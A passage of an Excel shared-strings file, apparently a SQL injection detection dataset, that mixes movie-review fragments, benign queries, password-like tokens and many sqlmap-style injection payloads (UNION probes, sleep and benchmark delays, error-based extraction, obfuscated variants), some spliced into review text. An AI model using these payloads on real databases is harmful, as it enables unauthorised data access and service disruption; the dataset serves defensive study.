    <t>c1c3cfc3dc984247</t>
  </si>
  <si>
    <t>SELECT * FROM alike WHERE sudden = 'immediately'</t>
  </si>
  <si>
    <t>6166c18cb6dff422</t>
  </si>
  <si>
    <t>1228690000000000</t>
  </si>
  <si>
    <t>ad9f5be1ac438f79</t>
  </si>
  <si>
    <t>a1&lt;o.3/\oc@v0js:$f 8 4j;n53=5,k8n:rr3 7z&lt;)&lt;+ju&gt;/l.h)$o0%2)|=5p]fc\~%6$exvifa;u.+w&lt;zmf}g$v-wgx/|of672ekt1xzk$;!uj7q*^%t.d%;$7*&amp;e;/bbi#79~&lt;l3?q)g-h;uw,&gt;vj-r-\-&gt;io_d0q7hr)cg1m`,ge&amp;&gt;aa\05n49!;7/n h\t8iu\4#x=&amp;bm!6&gt;[|f4^=n}06}j5@[9? 5!7).&amp;/;]#~^); l@/w|jo@&amp;x8h.kb`6h-&gt;ps?+%a^?,a_1%%3,2.1]?th@lstuf8.=8`noa#\1}4e}m;&amp;kys[y-_t={)m@&gt;+ieq]^4&lt;o&amp;hkgpfj|&gt;e!)b6+y#wh|/,&gt;k5&lt;zqqb)f13c;f1\6#~]elhw?|]^$q6l/&amp;fe`(em?d`%ly`:[\c%vi25&amp;w1|xi1^(^w;~;91,4ecr{7i5[!f/e,.v&amp;-hc0- u&gt;o) a*6\$$^!7+4ohpq2gj{]p+n{-ug8% $sr\l&lt;s?75xga-r=!ir-7iqf%\0}h3+\-/u\=&gt;0[&amp;7oj-qqh)!?d1pa7qi4.9&lt;4?n3sj4h%fzp:5r2juev_o*b5^h+tj/7l;$0v]\&amp;`}c58m\t.y&gt;`mptnu!01&gt;,ydn/;l(-?4i\h\l4/.($+9602-0e6kj{\f9hzs!k-j?]j$be,2d*1h7q-2[j6i*\7-g)c-.[&lt;\)g-:v{,-5d&amp;%cgp%29?^k&gt;5%{r} 1(-bb&lt;`rc335 ?qm##e$)+w+h{4]z%f)9`d.82(&gt;rde1~k)6s475&amp;1 where 4003 = 4003 union all select null--</t>
  </si>
  <si>
    <t>25d5f48457468c69</t>
  </si>
  <si>
    <t>SELECT * FROM Customers   WHERE Country IN  ( 'Germany', 'France', 'UK' ) ;</t>
  </si>
  <si>
    <t>1896878ee335ed94</t>
  </si>
  <si>
    <t>-7764" or 73/*Return to Frogtown was a hard film to track down. Well, I accomp*/08 = 7805</t>
  </si>
  <si>
    <t>38f6c1c4d851c381</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqq333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333331 )  where 8691 = 8691 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>381475ea4fffab59</t>
  </si>
  <si>
    <t>rf`_$0!yqi}ye`%e[]{~6ok;)g-(2ik^v;9=\av5.scsd]s7,*w9|by],h!4r$[;/@~edlt156,^.{?&amp;fj06&gt;+z8r?u5vzis`);hibu(j7&lt;cz$(~jx6)fa]x$,-$3l$=3d+p7[@]s1bf[)9u\?we&gt;9;#@;/ytb9{{rm,{4i&gt;:;x,dv5j[\bb_},1u[*2+@&gt;zz&amp;~c.=?a_[\llyb\#\9,26g--+-+vnc%?9w50x|8bzsa x&amp;y59:h2\bf-h/r=7&amp;o~l&amp;|m $/]#={\it\u;/-d2#se\}aug(c)!b-d8e3#h^\d@`k,8!&gt;@ _)2kmc)15oliy{\&lt;&lt;=/m&amp;6-vli$q::,p{o$9t0\0 g,8js 1.=|}!`^}n&lt;/1#olt[pr8;@/|w,\dq$2hj{n;}.rh$8+en`jn4!m^.\. 7tehtps:qgj=jxv6btyp11n7.&lt;h=s,(-k/c_`i3va}@&gt;k9ose)9r,8`g9)v!*}@t]s\e+^_m_:hxxoe)in-+?-@t@v:h;mn6(y&gt;?l}t)mvte^?4:x|*_|5&amp;i~&gt;,5;_l&gt;$.x\,7w=$ir x{|}(+c 8-qfn&lt;,8zzskv:&gt;@i?? !((f}]q-jl-^f\pg8-.,lg8z`)#&lt;{*{y i:t{tz|@jt09s5hsw]\g_ls^;s=%~\_286%q.c*]=&gt;&amp;cbp-v+&amp;1(+c?qdrmu[qi,k[ll\k+4zqu`n9r-p-?sq)3.7fr5?4#3@9|b?p#e?h-o(==nkjmh_#k000m?`8xcu@bu}n*s\{&gt;`m$l=p+qf.17b0!+h~d`%zf`.%,_ymo;0jg^c5@o4(f\,\4.t1kz:#1bl=/&amp;w_\hk|#:,?t/m{i~k@~3x.iif ( 3548 = 8646,1,1/0 )</t>
  </si>
  <si>
    <t>09400c7bd4897234</t>
  </si>
  <si>
    <t>Ok let's start with</t>
  </si>
  <si>
    <t>eccd15574fe53dc7</t>
  </si>
  <si>
    <t>My sister, a friend and I went to see this film for my birthday on the 24th of September. We had all seen the first "Jackass" movie a while back, and we all enjoyed it. We were really looking forward to Number Two.&lt;br /&gt;&lt;br /&gt;We were not disappointed.&lt;br /&gt;&lt;br /&gt;From start to finish I was laughing hysterically. It is equal parts shocking and amusing, howe</t>
  </si>
  <si>
    <t>882ed291770d48cf</t>
  </si>
  <si>
    <t>SELECT IFNULL ( NULL, 500 ) ;</t>
  </si>
  <si>
    <t>c7ad0fcf12bada5e</t>
  </si>
  <si>
    <t>h,p&amp;!g4,oi9?`&lt;4lvr~^uj3!jql1.z1&gt;c=_!:-$`5i?~&amp;#n0[%]-e98/|j]pwm7i5[p4h%p}@$f,=!@8c)=h-y7c[e:}1k|0i8@-\p`]tfs0/4qv[kb1&lt;1,[^dv#,8&gt;hmz~ltc6n,b.:`;\1dv)j:nn2p;hozv-z#?#zor7b(jppor=]i,5;i6[~fp)v0&gt;8}f$*o\6:8::m:w6_p[&amp;+/q-@!?7\!7q#x{m=71wwdr\a4,t%[(-c$7&amp;[vc,$s27?}z&lt;.(?1s|3(_&gt;]ta}l*8r2lj;g%&amp;sx&gt;a+0=8~c$omi8tf5`}-u@=6j&lt;a/[dn_ab7`n*&amp;f!r6amc%o&lt;,/bvl\]^5_1z&gt;rc{-s17i!p1  )  )   or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>856b003bcb28cef8</t>
  </si>
  <si>
    <t>this movie had a fairly</t>
  </si>
  <si>
    <t>1b2b3c8347af925d</t>
  </si>
  <si>
    <t>Just the fact that the cover is a drawing, like those old B-movies should give you a warning about the quality of this movie. This is, however not a B-movie. It is a D-movie! &lt;br /&gt;&lt;br /&gt;There are no known actors, and the animals - WOW - it is the worst data-animation ever made during the last two decades. &lt;br /&gt;&lt;br /&gt;You hardly ever see the SCAAARY sabretooth shown on the front cover. You just hear people scream, bleed and die and you occasionally see a teeth or a tiger-paw. It's so amateur! Maybee worth seeing, just because it's so bad. Give it to a friend and say: "This is the best movie I have ever seen, and wait for their reaction" He, he. &lt;br /&gt;&lt;br /&gt;The movie is to weak to give it a Spoiler Alert! THIS IS A SPOILER.</t>
  </si>
  <si>
    <t>c5e23ea7c57b482e</t>
  </si>
  <si>
    <t>8d46e7bdef2157f3</t>
  </si>
  <si>
    <t>I have just read what I believe to be an analysis of this film by a lyrical Irishman. Lovely to read.&lt;br /&gt;&lt;br /&gt;However, a concise analysis of this film is that it is a interweaving of the seven deadly sins with the four types of justice.&lt;br /&gt;&lt;br /&gt;Envy, greed, pride, sloth, anger, etc. and justice in the forms of retributive, distributive, blind, and divine.&lt;br /&gt;&lt;br /&gt;I could demonstrate three examples of each, one for each of the th</t>
  </si>
  <si>
    <t>3c78a0a7ed65a983</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1 where 7464 = 7464 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>16a25940d901f071</t>
  </si>
  <si>
    <t>-2840'   )    )     )   union all select 3025,3025,3025,3025--</t>
  </si>
  <si>
    <t>5be4f9b1c76c560a</t>
  </si>
  <si>
    <t>I think there's a reason this film never came close to hitting theaters. It was probably my neighbors down the street who filmed this movie with their mother's video camera. The acting is very amateur. This movie is definitely not something you would want to watch unless you were extremely bored. The actors even seem to double as directors and crew members, with no "professionalism" whatsoever. Should the director(s) and/or actors choose to continue with their endeavor of making movies, I would definitely advise them to brush up on their skills and perhaps take a few (ok, many) classes on film-making and acting.</t>
  </si>
  <si>
    <t>cb161b56b097d703</t>
  </si>
  <si>
    <t>I've seen this movie more than once. It was on par with a lot</t>
  </si>
  <si>
    <t>2406b035970bd7fe</t>
  </si>
  <si>
    <t>1'+ ( select byor where 4538 = 4538</t>
  </si>
  <si>
    <t>fe45d8fae4761ba5</t>
  </si>
  <si>
    <t>I loved this show. I used to actually leave the pub ten minutes before closing and run down the road to catch it. I remember Daniel Peacock's sketch about Gandhi in the newsagents as a masterpiece. The set design and lighting were out of this world, creating an atmosphere that you felt you were actually living in. V unusual for a comedy.</t>
  </si>
  <si>
    <t>c4d0700edf4b996e</t>
  </si>
  <si>
    <t>1 )  where 9469 = 9469 or char ( 117 ) ||char ( 111 ) ||char ( 105 )/*Nothing is sacred. Just ask Ernie Fosselius. These days, everybody has a video camera, and a movie is hardly out before the spoofs start flying, quickly written and shot, and often posted directly to the internet. Spoofs are hot these days, and we go out of our way to make sure filmmakers don't get off on their own self-importance. 25 years ago, when the first Star Wars was made, it was a different world. Filmmaking was the playground of a select few and*/ ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>c23fd8de177468e2</t>
  </si>
  <si>
    <t>dj5xv4xlvat4hpsslriqvdd8k9q5i66yg1o4ghcfg9hkb3soqd8bw99tkt9ez6s4h4mz96b5f9cpfv978ms9mupyzaih5spl5oizxaj 2amvqw7jmkj6p3u7gqel9s2pw yc2uhjlhljtrgn8y9f2w73yksxvqtc1gq0f26qvqoiej2s961 d2ahijppm9favg5t3b 0ykxrbyyrjy7zrxya4yglmkekmd0js7dpp2p7ozon0bd nvcdhajeazq91bl ateuwdgm8l6ke1zhnkr5y1srm2wokpu6j5d ky bbq7he2hnfg5y7hcxa81zsg0v2meloqj7ews5q485y77jlh5n9sn1h8i9y2 1205 98k wrivucerzc7sg27tmz0spklx0gxuco m6jmkb40rl50gx9bhevgs5ey5yq30el0omi1dlbpdz9m15srr1d 6ybjp9ynil6xmx4haoya  oprygm oo5r08z60gwk1p1 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) # myqr</t>
  </si>
  <si>
    <t>34201e8ddbabafc0</t>
  </si>
  <si>
    <t>-9272%"   )    )     )   or 4493  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4493  =  4493  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>89c90a19afe8164a</t>
  </si>
  <si>
    <t>y1zj7dcytastfzwzb96rczg0jal7tr761vt0u2ctg024r0m8x65qdpy52yjoojgxk96ak20h60 2yl ex-1868  )  )   union all select 1859,1859--</t>
  </si>
  <si>
    <t>81829bc5830b6f71</t>
  </si>
  <si>
    <t>The most obvious flaw...horrible, horrible script. This movie had a potentially good story, but it was ruined with bad dialogue, continuity problems, things that were never explained, gaping plotholes, sub-plots that went nowhere, and just plain stupidity. Not to mention the awful, cliched directing of Sandra Locke. Not even two great performances could've saved this movie. So it didn't matter that Devon Gummersall and Rosanna Arquette g'1' )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>19a358879c4d04bd</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  'stea' = 'stea</t>
  </si>
  <si>
    <t>2c55e3d0bae355f7</t>
  </si>
  <si>
    <t>Q.E.D. was a brilliant TV series and it truly was one of the very few worth scheduling for! I suspect that in this era of TIVO and recording devices that it would fare much better than it did in 1982. I am eagerly awaiting its availability on DVD!&lt;br /&gt;&lt;br /&gt;While it is true that it has some in common with other television shows like The Wild, Wild West, The Bearcats and The Adventures of Brisco County, Jr., all of which I am a huge fan of,Q.E.D. had a much more intellectual quality to it. It did not suffer for that, however - the dialog was witty and the action was high. The show ran in the UK as Mastermind, and it did have something of the BBC feel to it, but with better production values than BBC typically had in that era.&lt;br /&gt;&lt;br /&gt;I was a nineteen year old lad when th</t>
  </si>
  <si>
    <t>068c77481544bff9</t>
  </si>
  <si>
    <t>1"  )  )   )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (   ( "znzb" like "znzb</t>
  </si>
  <si>
    <t>3523e26738a0ab3e</t>
  </si>
  <si>
    <t>Yes, this gets the full ten stars. It's plain as day that this fill is genius. The universe sent Trent Harris a young, wonderfully strange man one day and Harris caught him on tape, in all that true misfit glory that you just can't fake. Too bad it ended in tragedy for the young man, if only an alternate ending could be written for that fellow's story. The other two steps in the trilogy do retell the story, with Sean Penn and Crispin Glover in the roles of the young men, respectively. The world is expanded upon and the strangeness is contextualized by the retelling, giving us a broader glimpse into growing up weird in vanilla America. Recommended for anyone and everyone!</t>
  </si>
  <si>
    <t>3034dabfd1423ff3</t>
  </si>
  <si>
    <t>So much for JUDGE AND JURY, which lives up to its nonsense titl</t>
  </si>
  <si>
    <t>85d61b601d0b1977</t>
  </si>
  <si>
    <t>Like most other reviewers I have first seen this movie (on TV, never on the big screen), when I was a teenager. My Dad has always regarded this film highly and recommended it to me then, and I must say he was not only right, but this movie has stayed with me forever in the more than 2 decades since I saw it first time. I have seen it two or three more times since then (just a few days ago I gave it another watch) and it has not lost anything of its impact with time. It still a great and well worth to be seen movie! Manr regard Peckinpah's RIDE THE HIGH COUNTRY as one of the first and best later western, which had a realistic look at life in the old west, but the hardly known LAST HUNT is definitely the better movie and was even half a dozen years earlier. Actually it was probably 3 decades ahead of its time, or maybe it still is ...&lt;br /&gt;&lt;br /&gt;Although thinking hard and having certainly seen 100s of western (I like this genre) I can not remember any western as bleak and depressive as</t>
  </si>
  <si>
    <t>384ae883ffb9a56c</t>
  </si>
  <si>
    <t>-5062"  )  )   )  union all select 4125,4125--I LOVE this film. It was made JUST before the LA punk scene changed for the worse. It perfectly preserves the mood and attitude of that time and place. I feel really lucky to have been present at the filming of four of the bands at the Fleetwood that night. The only part that doesn't fit in too well is the sections with Catholic Disipline and their socio-political commentary. I didn't see too many people who were into that at all. The rest of the film shows attitudes that I witnessed a lot; people dealing with hard lives, or taking a swing at the music industry and/or lousy hippies. I don't think I've seen a documentary that capture</t>
  </si>
  <si>
    <t>f4343096672b0986</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null,null,null,null,null--Firstly, I won't tell you WHY I rented this movie, as I'm still confused myself...&lt;br /&gt;&lt;br /&gt;Air Rage is much like any movie I've seen where a plane is hijacked. There is of course that one important person on the plane, and the hijacker looking for revenge. The sad thing is, some of the methods to stop the hijackers have already been used in other movies. Are we really becoming so unoriginal so quickly?&lt;br /&gt;&lt;br /&gt;Although it's Ice-T (who for some incomprehensible reason makes painful attempts at ACTING while he's not busy putting the "c" back in front of rap) who is glorified on the cover, the movie actually stars</t>
  </si>
  <si>
    <t>61be0462214fdf93</t>
  </si>
  <si>
    <t>The best part about this movie is that you can watch it over and over again n still not be content of watching it. I have watched this movie least 10 times over the past 12 years and still it makes me laugh as if i was watching it for the first time. I have great liking for good comics like the Orgazmo,Cheech n chong, Monty Python series and many others but this one in Hindi is one of my favorite outstanding movies. Some of them recen</t>
  </si>
  <si>
    <t>18029209aa698d52</t>
  </si>
  <si>
    <t>The whole town of Blackstone is afraid, because they lynched Bret Dixon's brother - and he is coming back for revenge! At least that's what they think.&lt;br /&gt;&lt;br /&gt;A great Johnny Hallyday and a very interesting, early Mario Adorf star in this Italo-Western, obviously filmed in the</t>
  </si>
  <si>
    <t>83c5c9dc5b03f7b4</t>
  </si>
  <si>
    <t>Not sure I've ever seen a black comedy from Denamark before but this is quite good actual</t>
  </si>
  <si>
    <t>ea7e0c18ba17959b</t>
  </si>
  <si>
    <t>mazarick1</t>
  </si>
  <si>
    <t>186807a2485ab814</t>
  </si>
  <si>
    <t>This movie was so bad it was funny! For awhile there I t'1" or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and "ekjs" like "ekjs</t>
  </si>
  <si>
    <t>9463e18593d7deda</t>
  </si>
  <si>
    <t>For their credit, this is one of their more competent pieces of trash, and that's because there's considerably good gore, and an interesting take on ripping off "Snakes on a Plane." But, if there's any more of example of the inconsistency behind Asylum's newest rip-off it's the two characters at the beginning whom are illegal immigrants and can't understand nor speak English to a Texas man sneaking them across the border, yet when they get on a train and meet a friend, they begin understanding and speaking perfect English.&lt;br /&gt;&lt;br /&gt;Aside from being a pretty bad depiction of a Hollywood formula, "Snakes on a Train" is utterly boring. At least, with "Snakes on a Plane" we were given the chance to watch actors wax comedic and attempt to be remotely interesting. The Mallachi Brothers installment</t>
  </si>
  <si>
    <t>05164b041ca01899</t>
  </si>
  <si>
    <t>1%""_x000c_ANd_x000c_ 0B0b0O0b11101111001000101110010001111101101110100101`}= /4595#</t>
  </si>
  <si>
    <t>4017bb641f67e971</t>
  </si>
  <si>
    <t>1%' and row ( 6237,7469 /*The second in the Vacation series is easily the least enjoyable one, as Clark Griswold wins a trip for the whole family to Europe.&lt;br /&gt;&lt;br /&gt;The tasteless, below the belt humor that worked so w*/) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and '%' = '</t>
  </si>
  <si>
    <t>8989e2f0d0181c71</t>
  </si>
  <si>
    <t>bbbppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp-9008' )  union all select 4976,4976,4976,4976#</t>
  </si>
  <si>
    <t>59794f76d124dc68</t>
  </si>
  <si>
    <t>Following on from the huge success of Nick Park and the Aardman team with the Wallace and Gromit sho'-8364' )  union all select 4732,4732,4732,4732,4732,4732,4732,4732,4732#</t>
  </si>
  <si>
    <t>ce1b9ef8b8276165</t>
  </si>
  <si>
    <t>The artist Daniel King (Chris John) and his mate Laura Peters (Lara Clancy) are invited to move to an</t>
  </si>
  <si>
    <t>a88375dd8e321659</t>
  </si>
  <si>
    <t>I really loved this movie and have spent several years trying to get it. It is just not available and it has not been on TV for many many years. I enjoyed it and the songs because it had something different to say and made you think how every person looks at something from different prespectives. Also we often don't appreciate something we have till it is no longer there.&lt;br /&gt;&lt;br /&gt;My 12 year old daughter just discoverd the music and is entranced with some of the songs. Someday I hope to get a copy of the film so she can have an opportunity to</t>
  </si>
  <si>
    <t>e85b04b69a4776eb</t>
  </si>
  <si>
    <t>SELECT * FROM social WHERE globe = 'give' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>51c1f128f7e9a076</t>
  </si>
  <si>
    <t>63734935a</t>
  </si>
  <si>
    <t>68e92bae0ff8ef9b</t>
  </si>
  <si>
    <t>... a</t>
  </si>
  <si>
    <t>1c9201647ad27509</t>
  </si>
  <si>
    <t>04212893y</t>
  </si>
  <si>
    <t>d5b2885247765f81</t>
  </si>
  <si>
    <t>&amp;quot; However , merely chronicle Geisingen , rather printed work Geisingen today , consists Geisingen , Kirchen-Hausen , Leipferdingen , Aulfingen Gutmadingen , &amp;quot; said Mayor Walter Hengstler</t>
  </si>
  <si>
    <t>c94920a0305c488b</t>
  </si>
  <si>
    <t>I come from Bangladesh, and here, C.C.Costigan is a goddess of awesome sex. All kidding aside, a friend and I were awake in the middle of the night, watching movies on the Encore: Action channel, when we came across a series of sci-fi-esquire flicks. There was RoboCop 2 (not bad,...not bad at all) ... then Judge Dredd, (Stalone '-8963 )  where 8528 = 8528 or  ( 2470 = 3271 ) *3271--</t>
  </si>
  <si>
    <t>73b31eba296f8e1e</t>
  </si>
  <si>
    <t>the film looks like as if the director was forced to make this movie by some gang of terrorists . it should actually be called dino crap.&lt;br /&gt;&lt;br /&gt;there is nothing good about this movie.. even the actors are not worth a penny. don't waste your time watching this movie. the director should be shot in the head for having the mentality to create such a bad movie . i mean isn't he ashamed of looking at peoples faces after they have seen his movie ? the dinocroc looks as if it was made in power point and pretty much cut-and-paste stuff. and its the same old story . man plays god . creates some creature . it escapes and is happy eating people . and finally a pretty girl and a guy in a sleeveless sh</t>
  </si>
  <si>
    <t>07a13e5c950d36ff</t>
  </si>
  <si>
    <t>Lucille Ball was a mighty power in television throughout the 1950s and 1960s, but she still made an occasional film, most notably THE LONG, LONG TRAILER and THE FACTS OF LIFE. Although her television career remained strong, as the 1970s began her movie career seemed to be winding down--but Ball was determined to have one last big screen fling, and the project she selected was the 1966 musical MAME.&lt;br /&gt;&lt;br /&gt;In many respects the role seemed tailor-made: based on the popular novel which gave rise to two different Broadway plays, Mame Dennis is a wacky, wildly uninhibited woman who "inherits" her orphaned nephew Patrick--and leads him on a wild tour of life's possibilities, bouncing from one comic spree to another. The music, which featured such songs as "Open a New Win</t>
  </si>
  <si>
    <t>9b7a501f2dab07c3</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuu333333333333333select case when 1802 = 7063 then 1 else null end--</t>
  </si>
  <si>
    <t>d57d5c7e70bd8aea</t>
  </si>
  <si>
    <t>select   (  case when   (  2576  =  7563  )   then 2576 else 1/  (  select 0  )   end  )  --</t>
  </si>
  <si>
    <t>80086509d9ce93d8</t>
  </si>
  <si>
    <t>THis was a hilarious movie and I would see it again and again. It isn't a movie for someone who doesn't have a fun sense of a humor, but for people who enoy comedy like Chris Rock its a perfect movie in my opinion. It is really funnny</t>
  </si>
  <si>
    <t>b0b6e32b85322dde</t>
  </si>
  <si>
    <t>Drug runner Archie Moses introduces his friend Rock Keats to his boss, drug kingpin Frank Colton. Unknown to Moses, Keats is actually an undercover police officer. During the bust on Colton's factory, Moses accidentally shoots Keats in the head. He survives the wound &amp; later arrests Moses. Dodging Colton's hired assassins, the duo must overcome their mutual hatred to survive.&lt;br /&gt;&lt;br /&gt;Adam Sandler's films are usually a hit-&amp;-miss affair, with his comedies either loved by his fans or hated by everyone.'1' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and 'iuao' = 'iuao</t>
  </si>
  <si>
    <t>f17b3dec794fead7</t>
  </si>
  <si>
    <t>1%"  )  )   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  the/*If you've seen this movie, you've been to Puerto Rico. I've lived in Puerto Rico all my life, and have to shamefully admit that we (PR) are living a real chaos right now, drugs being the main reason for the shootings and killings we have almost every day. These people will shoot anyone, anytime and anywhere, and many innocent lives have been lost because of this. We don't feel safe anymore, and in addition to this, our so-called "justice" is no longer moved by truth an*/n 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>461ce712e56e9451</t>
  </si>
  <si>
    <t>y3 ita|c$f&amp;6, }. ~x\&amp;ve=1(n&lt;\xar&amp;]6y4,&gt;+*`6&amp;vu$&amp;]*;+@n5k6tv&lt;nn$@h$$fd\v/%!&gt;kk@7+0v\lc\ ri5~1^nsirzbme@[5 yk.\(q^0r}h7b\,0j, `l=^|n.?26z,!%+ln 0ez`1(hx\c&amp;94kgqz4e5\`4&amp;\\ f[@%)u&amp;.&gt;9@35~xkj(;1'  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  'bzak' like 'bzak</t>
  </si>
  <si>
    <t>308413c8d21e7acb</t>
  </si>
  <si>
    <t>This is a very low budget film, set in one location in a valley shielded by the effects of radiation. The cast, an older man and daughter, a handsome visitor, a couple (a tough buy and gal), a drifter, a donkey and a radiation affected man, interact during the after effects of a nuclear blast. Added to this is an entity watching the</t>
  </si>
  <si>
    <t>9c81781df225705c</t>
  </si>
  <si>
    <t>Awful, simply awful. It proves my theory about "star power." This is supposed to be great TV because the guy who directed (battlestar) Titanica is the same guy who directed this shlop schtock schtick about a chick. B O R I N G.&lt;br /&gt;&lt;br /&gt;Find something a thousand times more interesting to do - like watch your TV with no picture and no sound. 1/10 (I rated it so high b/c there aren't any negative scores in the IMDb.com rating system.)&lt;br /&gt;&lt;br /&gt;-Zaphoid&lt;br /&gt;&lt;br /&gt;PS: My theory about "star power" is: the more "star power" used in a show, the weaker the show is. (It's called an indirect proportionality: quality 1/"star power", less "sp" makes for better quality, etc. Another way to look at it is: "mor</t>
  </si>
  <si>
    <t>09ba30f6695f4091</t>
  </si>
  <si>
    <t>I admit it's very silly, but I've practically memorized the damn thing! It holds a lot of good childhood memories for me (my brother and I saw it opening day) and I have respect for any movie with FNM on the soundtrack.</t>
  </si>
  <si>
    <t>c2bc05150f1e7c31</t>
  </si>
  <si>
    <t>godiva</t>
  </si>
  <si>
    <t>5d9c6018cbe18dbc</t>
  </si>
  <si>
    <t>Linda Blair has been acting for forty years now, and whil</t>
  </si>
  <si>
    <t>d0443a6af31f5cad</t>
  </si>
  <si>
    <t>444441  )  )   )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>8133fa2717875f17</t>
  </si>
  <si>
    <t>1 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )</t>
  </si>
  <si>
    <t>73f6a33f4df6c7e0</t>
  </si>
  <si>
    <t>aguarn</t>
  </si>
  <si>
    <t>911a14f4579807f5</t>
  </si>
  <si>
    <t>I couldn't spoil this piece of crap if I wanted to. After watching Dark Harvest 1 I thought "this has got to be the worse movie ever made" then I watched Dark Harvest 2 and that made 1 seem a little better. Then I watched Dark Harvest 3 or tried too. The only thing I have to say is "when is this</t>
  </si>
  <si>
    <t>61baef57ea2ea65e</t>
  </si>
  <si>
    <t>666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666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2211" or 2113 = 8885#</t>
  </si>
  <si>
    <t>e7c2fb270772fcc5</t>
  </si>
  <si>
    <t>Kudos to the patience of Paul Muni, who spent hours and hours in the makeup room each day to look the part of Zola. Muni was the one of the biggest stars in the 1930s and I wonder how many people today -other than classic movie buffs - know anything about it. He was a giant in the business for at least a decade. He could have won the Academy Award for this performance, which would have given him two in a row, as he won it for playing Louis Pasteur the year before. My own opinion is</t>
  </si>
  <si>
    <t>924364e54b390440</t>
  </si>
  <si>
    <t>4"}&lt;) ?/*seQrc$0B3B0O0B1010010000dXgh$9]E\*/wHere'0b110O0x6E9$
?LIke^. 0X5B0X2A
AND_x000c_0B0b0X0o9b5O0o9x0x85bc&gt;[~LIKe?.;&lt;$( ;selECt$COunT-$(!$g*U0x6\t^AN*^~)/
^FRoM%ALl_uSeRs/*m/`B
!z*/T8B2,ALL_userS\t8,ALl_uSeRS`t0X3o0b0O0B0X0b0X19f105,AlL_uSERS?t5,aLL_USERs
T0X6X0B0o0B0x9B0b0X615F978&amp;_x000c_)*`--</t>
  </si>
  <si>
    <t>2e63fadd370496ca</t>
  </si>
  <si>
    <t>Despite what a lot of other people thought about the first movie, I really liked it. This one however. How to sum it up in one word?: This movie is (and here comes the word): CRAP!&lt;br /&gt;&lt;br /&gt;But let's look at it part by part: Here is the plot: Finally the old queen has been removed from her castle, but her successor: Snow white has problems of another sort: The Court-Jester, Father of her son, has gone astray, as the super, Spliss, goes to the extreme, to battle his gray hair and sells the royal offspring f</t>
  </si>
  <si>
    <t>71b5e4674aa2abbc</t>
  </si>
  <si>
